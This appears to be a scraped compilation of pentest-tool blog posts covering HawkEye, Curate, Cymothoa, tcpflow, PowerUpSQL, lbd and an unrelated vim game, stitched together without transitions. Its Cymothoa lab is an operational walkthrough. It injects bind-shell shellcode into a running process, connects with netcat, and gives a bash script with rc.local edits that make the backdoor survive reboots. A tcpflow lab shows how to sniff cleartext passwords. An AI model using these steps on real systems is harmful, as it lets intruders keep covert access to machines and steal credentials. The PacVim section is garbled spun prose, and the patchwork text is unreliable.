HawkEye is a simple tool to crawl the filesystem or a directory looking for interesting stuff like SSH Keys, Log Files, Sqlite Database, password files, etc. Hawkeye uses a fast filesystem crawler to look through files recursively and then sends them for analysis in real time and presents the data in both json format and simple console output. The tool is built with a modular approach making it easy to use and easily extensible.
It can be used during pentests as a privilege escalation tool to look through the filesystem finding configuration files or ssh keys sometimes left by the sys-admins.
Features
Simple and modular code base making it easy to contribute.
Fast And Powerful Directory crawling module doing real-time analysis
Easily extensible and vast scanner (Thanks to Gitrob)
Curate is a tool for fetching archived URLs and to be rewritten in Go.
Curate Initial set-up one-liner
This will clone this repository and then move all scripts to /usr/local/bin.
$ git clone git@github.com:EdOverflow/curate.git \
&& cp curate/curate /usr/local/bin/ \
&& echo "You can delete the ./curate/ folder now."
Once you have are done with this one-liner, make sure to include your VirusTotal API key in your .bashrc file. The variable should be named VIRUS_TOTAL_API_KEY.
Curate outputs the results into a curate.txt file which allows you to easily grep through the URLs for keywords. Here are some ideas for things to grep for in curate.txt.
admin
password
key
api
hmac
url
path
redir
php
id=
It is advisable to exclude images and stylesheets from your searches by piping everything into ‘grep -v’.
Disclaimer
This project is made for educational and ethical testing purposes
only. Usage of this tool for attacking targets without prior mutual
consent is illegal. Developers assume no liability and are not
responsible for any misuse or damage caused by these scripts.
Cymothoa is a post-exploitation tool. It can be used to maintain access to an exploited system. Cymothoa injects a variety of shellcodes to running processes in a system. Almost all nix systems most of the Linux variants can be backdoored with cymothoa.
Cymothoa uses ptrace library in nix systems to evaluate running processes & inject shellcodes. The greatest advantage of this tool is that we need not create a separate process for the backdoor. While a process is running itself, we can infect a process and start a backdoor. Say for example, if we exploited a web server, hell sure apache2 or httpd or nginx or whatever the web server program is, will be turned on during boot. So we try to inject cymothoa to such service daemons & automate its start during boot. Let’s see it in action, but first, learn a bit about cymothoa
Main options:
-p process pid
-s shellcode number
-l memory region name for shellcode injection (default /lib/ld)
search for "r-xp" permissions, see /proc/pid/maps...
-m memory region name for persistent memory (default /lib/ld)
search for "rw-p" permissions, see /proc/pid/maps...
-h print this help screen
-S list available shellcodes
Injection options (overwrite payload flags):
-f fork parent process
-F don't fork parent process
-b create payload thread (probably you need also -F)
-B don't create payload thread
-w pass persistent memory address
-W don't pass persistent memory address
-a use alarm scheduler
-A don't use alarm scheduler
-t use setitimer scheduler
-T don't use setitimer scheduler
Payload arguments:
-j set timer (seconds)
-k set timer (microseconds)
-x set the IP
-y set the port number
-r set the port number 2
-z set the username (4 bytes)
-o set the password (8 bytes)
-c set the script code (ex: "#!/bin/sh\nls; exit 0")
escape codes will not be interpreted...
Payloads
0 - bind /bin/sh to the provided port (requires -y)
1 - bind /bin/sh + fork() to the provided port (requires -y) - izik <izik@tty64.org>
2 - bind /bin/sh to tcp port with password authentication (requires -y -o)
3 - /bin/sh connect back (requires -x, -y)
4 - tcp socket proxy (requires -x -y -r) - Russell Sanford (xort@tty64.org)
5 - script execution (see the payload), creates a tmp file you must remove
6 - forks an HTTP Server on port tcp/8800 - http://xenomuta.tuxfamily.org/
7 - serial port busybox binding - phar@stonedcoder.org mdavis@ioactive.com
8 - forkbomb (just for fun...) - Kris Katterjohn
9 - open cd-rom loop (follows /dev/cdrom symlink) - izik@tty64.org
10 - audio (knock knock knock) via /dev/dsp - Cody Tubbs (pigspigs@yahoo.com)
11 - POC alarm() scheduled shellcode
12 - POC setitimer() scheduled shellcode
13 - alarm() backdoor (requires -j -y) bind port, fork on accept
14 - setitimer() tail follow (requires -k -x -y) send data via upd
Lab: Inject Backdoor into a Compromised Linux System
Scenario: We have an attacker system running Kali linux with IP 192.168.0.103, a target Linux system(metasploitable 2.0) with IP 192.168.0.102. The story continues after the victim is exploited. I have already got a meterpreter shell connected to the victim.
I will explain in brief the procedure for this. Take a look at the following figure.
Post Exploitation & Backdooring Procedure with cymothoa.
Yes, that is the algorithm. I want you to understand the procedure rather than just copying the steps. We first exploit the system gain access to it. Then the rest is all about Maintaining access.
Then we can try uploading the existing cymothoa binary(/usr/bin/cymothoa or /usr/share/cymothoa) to the target & try executing it. But it failed for me all the time. So if it does, proceed to step 3 below. If it doesn’t, don’t worry, we have access to the system, we will download a new copy & install it.
After installation, try executing it. If the cymothoa banner comes, then the installation is successful. After this, we try infecting a running process & see if we can get a connection. Mostly this will succeed. If it doesn’t just try it with another process. But the problem with this is it only lasts for the present & not for the future.
Meaning, if the process dies or the system is rebooted, we won’t get the backdoor running. For this, we create a shell script and edit some boot time configurations in the victim & make a process infected each time the system starts or reboots. Thus we can have a persistent backdoor.
Enough Talk, Lets Attack!
Step 1: Download Cymothoa & Upload it to Victim
Download the latest version from the link below using the web browser in Kali Linux attacker machine.
Cymothoa being Downloaded in Kali Linux Attacker machine.
The default location is /root/Downloads. Remember this.
Now I have a meterpreter session running(How to gain access in Exploitation section.). Upload the downloaded archive to the victim. Optionally you can also download it directly to the victim (if you know).
meterpreter > upload Downloads/cymothoa<press tab> <space> /root/
meterpreter > shell
command: tar -xvf cymothoa< Enter full name here, Pressing tab key Doesen't work>
Uploading the archive to the victim.
Note: Every time you drop into a shell from meterpreter, the shell has limited capabilities. Tab key doesn’t work & vim doesn’t return a display. It crashes if we open something in vim or nano.
Step 2:Install Cymothoa & Execute.
While we are in the shell. Change directory to the location we uploaded the archive and give execute permissions. Then execute the “Makefile”.
Tip: Remember to check whether the listening port(-y option) is already in use.
Now check if the port is open
command: netstat -l | grep 100<your port here>
Infecting a process with Cymothoa
Step 4: Try a netcat connection from the attacker machine.
Open up a new terminal in Kali Linux attacker system & initiate a netcat connection to the port we specified
command: nc 192.168.0.102 100 <give your victim ip & port>
Netcat Connection to Cymothoa Backdoor
There you have…!
Step 5: Prepare script, upload it & set up execution.
This is the hard part. If you have any idea about shell scripting you can understand. Or else try to learn some. Anyway, the script is very simple. It first extracts the pid of a service or a daemon. Checks if it is a number or not.
Sometimes a process will have child processes. So there will be more than one pids available. In that case it is essential to extract one pid alone from a list of pids. Then the script assigns the pid to a variable (say q here). Then executes cymothoa with value of the variable q as the value for the “-p” option. Here is the script.
#!/bin/bash
p=`cat /var/run/crond.pid`
#extracts the pid. Here replace the last with a process of your desire.
#example: p=`cat /var/run/apache2.pid`.
#Remember the chracter before cat & after pid is a backtick & not an inverted comma.
if [ "$p" -eq "$p" ] 2>/dev/null; then #checks whether it's a number or not.
q=$p
else
q=`(echo $p | awk '{print $2}')` #takes the next row which will be a number. Here also it's a backtick
fi
echo $q
exec /cymothoa-1-alpha/cymothoa -p $q -s 1 -y 100 # make sure to give absolute path of cymothoa in the victim.
exit
Things to note:
When assigning the output of a command to a variable, a backtick is used.
Always give absolute & full paths whenever needed.
You can choose any service. A service which is likely to start at boot like apache2/crond/vsftpd/mysqld etc is appropriate.
Pid location is standard unix systems is ” /var/run/process.pid “.
Make sure the listening port(-y option) will be unused by other services. Giving port 80 will be a bad idea if it’s a web server.
Copy the script to a file in the kali linux machine. Edit it accordingly and save it.
The Script
Drop back to meterpreter shell by pressing Cntrl+c & upload the script to /etc/init.d
meterpreter> upload cym.sh /etc/init.d/ <replace cym.sh by your filename>
Drop to the shell again by giving shell command & change permissions.
meterpreter> shell
chmod +x /etc/init.d/cym.sh <replace by your file>
Uploading the Script
Now is the big part. We have to enable the script to run during boot time. this is simple, just add an entry to /etc/rc.local. But vim or nano will not be available.
Also if we cat the file(rc.local) there is a statement “exit 0” at the end. Any statements appended after this will not be executed. So we have to cut the last line, append our new line & then append the old exit line.
Editing the ConfigurationEditing the Configuration
Note: Here also give absolute paths when writing it to the rc.local file.
All SET..!
Now while in the shell, issue
command: /etc/init.d/rc.local start
If every step were right, you got it. Then try netstat while within the shell & see if the port is listening. If you are permitted, reboot the machine so that the shell & meterpreter session dies. Open a netcat to the victim after some time. You will be amazed.
Phew ! That was long but you will get very good results. I had to do a lot of research for each steps in the process & would definitely like your feedback. Try this out & please subscribe, comment & follow this blog everywhere.
Tcpflow is a TCP/IP Demultiplexer. Tcpflow is used to record traffic mainly between 2 hosts although it can be used to monitor thousands of connections. Tcpflow differs from other tools by actually capturing the real data and dumping it to a file we specify.
It can be then further used for other analysis purposes. One more advantage of tcpflow is it effectively reconstructs broken packets. Also, tcpflow has a variety of filter options. We can filter out the capture in a lot of different ways and that too very easily.
Normally most of the sniffing attacks include arp-poisoning as the first stage. However, tcpflow captures almost all data without actively poisoning the subnet or network.
Options
Syntax: tcpflow [options] [expression] [host]
-b: max number of bytes per flow to save
-c: console print only (don't create files)
-C: console print only, but without the display of source/dest header
-d: debug level; default is 1
-e: output each flow in alternating colors(Blue=client to server;Red=server to client;Green=Unknown)
-f: maximum number of file descriptors to use
-h: print this help message
-i: network interface on which to listen
-p: don't use promiscuous mode
-r: read packets from tcpdump output file
-s: strip non-printable characters (change to '.')
-v: verbose operation equivalent to -d 10
This lab demonstrates basic console-logging of data to and from the target. Here our target IP is 192.168.0.100. Also, domain/hostnames are acceptable.
Note: If you are using any other interface make sure to give -i option & the corresponding interface.
TCP flow starting capture
Suppose we need all the HTTP traffic in the network,
command: tcpflow -ce port 80
All HTTP traffic in the network in alternating colors
We can use logical comparisons also during capturing. For example, we want to see all the HTTP & https traffic from & to the host, we issue:
Command: tcpflow -ce host 192.168.0.100<your target> and port 80 or port 443.
Here the command selects the host “192.168.0.100”, do an “AND” operation to the condition: port 80 “OR” port 443. Specifically, HTTP or https traffic from & to host(192.168.0.100) is captured and displayed. Remember HTTP runs on port 80 & https on 443.
Selecting all HTTP & https traffic from and to the specified host.
Lab2: Dump Data to a local folder
This lab demonstrates on dumping the all the data between the target. Tcpflow dumbs all data into the current working folder(execute the command:pwd to know your current present working directory). So let’s create a folder for dumping the data and then execute tcpflow.
You can see all files being dumped into the directory with the host we have given as the beginning of the filename.
Capture files in the specified folder
The advantage from this tool is that any clear text data like HTTP authentication or telnet connection or smb authentication etc will be visible to you. Once you dump all the traffic, you can view it later and analyze it at a later point in time and whatnot? You can load it to Wireshark or any tool like xplico for forensic analysis etc.
Try for yourself, start tcpflow, and go to any HTTP site(not facebook or twitter) maybe your local router login page. Give password and analyze the tcpflow output.
Don’t forget to Subscribe, Like us on FB, Follow us on Twitter, G+, and comment here.
Mallet is a tool for creating proxies for arbitrary protocols, along similar lines to the familiar intercepting web proxies, just more generic.
It is built upon the Netty framework, and relies heavily on the Netty pipeline concept, which allows the graphical assembly of graphs of handlers. In the Netty world, handler instances provide frame delimitation (i.e. where does a message start and end), protocol decoding and encoding (converting a stream of bytes into Java objects, and back again, or converting a stream of bytes into a different stream of bytes – think compression and decompression), and higher level logic (actually doing something with those objects).
By following the careful separation of Codecs from Handlers that actually manipulate the messages, Mallet can benefit from the large library of existing Codecs, and avoid re-implementation of many protocols. The final piece of the puzzle is provided by a Handler that copies messages received on one pipeline to another pipeline, proxying those messages on to their final destination.
Of course, while the messages are within Mallet, they can easily be tampered with, either with custom Handlers written in Java or a JSR-223 compliant scripting language, or manually, using one of the provided editors.
Building Mallet
Mallet makes use of Maven, so compiling the code is a matter of
mvnpackage
To run it:
cd target/java -jar mallet-1.0-SNAPSHOT-spring-boot.jar
There are a few sample graphs provided in the examples/ directory. The JSON graphs expect a JSON client to connect to Mallet on localhost:9998/tcp, with the real server at localhost:9999/tcp. Only the last JSON graph (json5.mxe) makes any assumptions about the structure of the JSON messages being passed, so they should be applicable to any app that sends JSON messages.
The demo.mxe shows a complex graph, with two pipelines, both TCP and UDP. The TCP pipeline is built to support HTTP and HTTPS on ports 80 and 443 respectively, as well as WebSockets, while relaying any other traffic directly to its destination. The UDP pipeline is built to process DNS requests on localhost:1053/udp, replace queries for google.com with queries for www.sensepost.com, and forward the requests on to Google DNS servers.
RiskySPN is a collection of PowerShell scripts focused on detecting and abusing accounts associated with SPNs (Service Principal Name). This module can assist blue teams to identify potentially risky SPNs as well as red teams to escalate privileges by leveraging Kerberos and Active Directory.
PowerUpSQL includes functions that support SQL Server discovery, weak configuration auditing, privilege escalation on the scale, and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements.
However, PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.
Install it from the PowerShell Gallery. This requires local administrative privileges and will permanently install the module.
Install-Module -Name PowerUpSQL
Download the project and import it. This does not require administrative privileges and will only be imported into the current session. However, it may be blocked by restrictive execution policies.
Import-Module PowerUpSQL.psd1
Load it into a session via a downloading cradle. This does not require administrative privileges and will only be imported into the current session. It should not be blocked by executions policies.
PacVim is a free open source, text-based game that teaches you vim commands in a simple and fun manner. In spite of the fact that Vim is a prominent content editor on Linux systems, individuals still think that its difficult to learn, it has a precarious expectation to learn and adapt particularly the propelled highlights, a considerable measure of Linux amateurs are actually apprehensive of taking in this powerful and highly recommended text editor.
Then again, so much exertion has been coordinated by the Tecmint and Linux community towards making Vim simple to learn; from making Vim instructional exercises, sharing valuable Vim use tricks and tips, to creating intelligent learning web-applications and command line games, for example, PacVim.
PacVim is motivated by the well known and exemplary PacMan games, and keeps running on Linux and MacOSX. It causes you to extensively learn vim summons in a pleasant way. Its goal is pretty much like that of PacMan – you should move the pacman over every one of the characters on the screen while keeping away from the apparitions.
To install PacVim game, you need to first install required Curses (graphics library) package on your Linux distribution using default package manager as shown.
Load balancing(lbd) is the technique used in different services for balancing the load across different servers or NICs. It can be in any form. Load balancing can be done to evenly distribute workload through a series of Computer clusters.
Or it can be used within a single system to balance connections across a set of network interface cards or disks. In a cluster of computers, all systems will have all the data synced within them. A manager resource selects the specific node within the cluster when an incoming request is made.
The manager effectively transfers the connections to another node if the workload of any one of the nodes is high. Thus load balancing minimizes response-time & maximizes throughput. Load balancing can be implemented in both software & hardware levels.
Typical Load Balancing
Typically HTTP & DNS load balancing is done when a website has got a lot of incoming traffic like an e-Commerce website or the best example would be Facebook or Google itself.
These websites receive at least 10M requests per minute. So obviously a single host will not be able to serve all these requests. So their requests will be spread over a series of computing resource clusters in order to keep them running.
In a Security perspective, implementing HTTP load balancing has the following major advantages:
DDos & Synflood Protection
Load Balancing enables SYN-Cookies which help in preventing DDoS Attacks. & SYN flood attacks.
SSL Offload & Acceleration
In TLS enabled sites, loads are much higher for the web server since a series of continuous asymmetric encryption is going on. This decreases the throughput, but load balancing balances the load across different nodes inside a cluster and distributes the excessive load due to TLS.
Hiding Error Pages
Some HTTP load balancers can hide the HTTP error pages from being seen outside.
Firewall & IPS
Implementing load balancing creates a layer between the client and the server. So direct connection between the client & server is not possible. So within this layer, firewalls & Intrusion Prevention Systems can be implemented. Moreover, a WAF also can be in the way.
Priority Queuing
Load balancers can prioritize the traffic & intelligently serve the incoming requests.
Comming to the tool, an lbd is a short form for Load Balancing Detection. It is simply a shell script which automates a series of tests to verify whether a domain has load balancing.
Practical Use to a Pentester – lbd
One may ask why to detect load balancing during a pentest. The answer is that it eliminates inconsistency in results. The explanation is, Recon is the major part in every pentest. So it is very essential to determine the range of IP addresses which should be included in the scope of the test.
When dealing with servers with load balancing, the results of regular tests may vary due to the load balancer in work. Sometimes we may get different IP addresses when we ping the host at different times during a test. This is because a DNS-load balancer might be in place.
Missing this fact may prove fatal. Moreover, when determining the infrastructure of the target, we may miss this critical fact and as said earlier, we may miss the presence of an IDS/IPS or a Firewall in between the outside world & the target server.
Simply it may be configured to allow all HTTP traffic so that we are not able to detect it.
Syntax: lbd targetdomain port(defaults to 53 & 80) <options>
If you are interested to get under the hood, try the following
cat /usr/bin/lbd
Lab: Enumerate a domain and detect whether it has load balancing enabled
This is simple detection. Let our target be Microsoft’s bing this time.
command: lbd bing.com 80
Load Balancing DetectionLoad Balancing Detection
Try for yourself. Detect whether the e-Commerce company Amazon has load balancing on its web servers. Remember not to harm them or you may face consequences.
